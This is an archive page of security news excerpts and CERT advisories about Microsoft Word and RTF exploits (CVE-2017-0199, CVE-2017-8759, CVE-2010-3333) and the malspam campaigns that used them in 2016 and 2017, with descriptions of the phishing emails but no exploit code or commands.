RTF – Page 3 – WindowsTechs.com

VU#101048: Microsoft .NET framework SOAP Moniker PrintClientProxy remote code execution vulnerability

Posted on September 13, 2017 by CERT

The Microsoft.NET framework fails to properly parse WSDL content,which can allow a remote,unauthenticated attacker to execute arbitrary code on a vulnerable system. Continue reading VU#101048: Microsoft .NET framework SOAP Moniker PrintClientProxy remote code execution vulnerability→

New Microsoft Word zero day used in Russian-language spyware campaign, analysts say

Posted on September 12, 2017 by Chris Bing

A well-funded spy group appears to have recently acquired a highly sophisticated zero day vulnerability and used it to deploy a remote access trojan against a Russian-speaking “entity,” according to evidence discovered by U.S. cybersecurity firm FireEye. Researchers with FireEye found the disruptive software vulnerability, which affects recent versions of Microsoft Word, in July. The trojan, known as FinSpy, is made by infamous surveillance technology firm FinFisher, a blog post by FireEye says. The Word flaw remained unpatched until Tuesday afternoon, when Microsoft issued its monthly security update. This vulnerability, labeled CVE-2017-8759, was used as recently as late August to hack into systems, FireEye analyst Ben Read told CyberScoop. Analysts originally uncovered CVE-2017-8759 while examining a highly targeted phishing email that was written in Russian. The email contained an attachment that when opened exploited a software flaw in the word processor to remotely download FinSpy from a computer server controlled by the attacker. […]

The post New Microsoft Word zero day used in Russian-language spyware campaign, analysts say appeared first on Cyberscoop.

Continue reading New Microsoft Word zero day used in Russian-language spyware campaign, analysts say→

CONFIRM ORDER AND REVISE INVOICE malspam uses CVE-2017-0199 rtf exploit to deliver malware

Posted on June 26, 2017 by Myonlinesecurity

An email with the subject of *CONFIRM ORDER AND REVISE INVOICE* pretending to come from admin@ random company with a malicious word doc attachment. This word doc is actually a RTF file that uses what looks like the CVE-2017-0199 exploit, although this looks quite different to previous versions I have seen. At … Continue reading → Continue reading *CONFIRM ORDER AND REVISE INVOICE* malspam uses CVE-2017-0199 rtf exploit to deliver malware→

CONFIRM ORDER AND REVISE INVOICE malspam uses CVE-2017-0199 rtf exploit to deliver malware

Posted on June 26, 2017 by Myonlinesecurity

Another fake eFax email delivers malware via ole rtf exploit

Posted on June 8, 2017 by Myonlinesecurity

Another fake eFax email that I never got round to dealing with yesterday. subject of eFax message from “116 – 921 – 1271 ” – 5 page(s) pretending to come from eFax Inc <noreply@efax.com> with a zip attachment containing a malicious word doc They are using email addresses and subjects that will … Continue reading → Continue reading Another fake eFax email delivers malware via ole rtf exploit→

fake bookatable.com and efaxcorporatexx.top malspam using CVE-2017-0199 exploits to deliver malware

Posted on May 25, 2017 by Myonlinesecurity

Back to RTF files this time using the CVE-2017-0199 vulnerability that was fixed in April 2017 and again extra added protections by the May 2017 security updates. If you haven’t got round to applying these essential patches yet, then go & do it NOW!!!! The malware payload is the same … Continue reading → Continue reading fake bookatable.com and efaxcorporatexx.top malspam using CVE-2017-0199 exploits to deliver malware→

fake payment for message malspam using CVE-2017-0199 word /rtf embedded ole link exploit

Posted on May 4, 2017 by Myonlinesecurity

An email with the subject of PAYMENT FOR YAREED [ random names) coming from random names and email addresses with a malicious word doc attachment delivers some sort of malware via the CVE-2017-0199 word /rtf embedded ole link exploit attack. If you have updated Microsoft Word with the patches to protect yourself … Continue reading → Continue reading fake payment for message malspam using CVE-2017-0199 word /rtf embedded ole link exploit→

VU#921560: Microsoft OLE URL Moniker improperly handles remotely-linked HTA data

Posted on April 10, 2017 by CERT

Microsoft OLE uses the URL Moniker to open application data based on the server-provided MIME type,which can allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system. Continue reading VU#921560: Microsoft OLE URL Moniker improperly handles remotely-linked HTA data→

new malware delivery method fast spreading probably Locky with office rtf files with individual passwords

Posted on September 27, 2016 by Myonlinesecurity

Heads up everybody, we have a major change this morning in what I assume is a Locky or Dridex delivery system. The files come as RTF files but each rtf file has an individual password. None of the online automatic … Continue reading →

Source

Continue reading new malware delivery method fast spreading probably Locky with office rtf files with individual passwords→

Please kindly find attached your swift copy of payment malspam with RTF exploit

Posted on June 23, 2016 by Myonlinesecurity

An email with the subject of Fwd: Re: TT-USD78600.00 pretending to come from barat.mnupack@mnubd.com with a malicious word doc attachment is an attempt to exploit CVE-2010-3333 which is a buffer overflow in word RTF files. Anybody using a modern version of word, … Continue reading →

Source

Continue reading Please kindly find attached your swift copy of payment malspam with RTF exploit→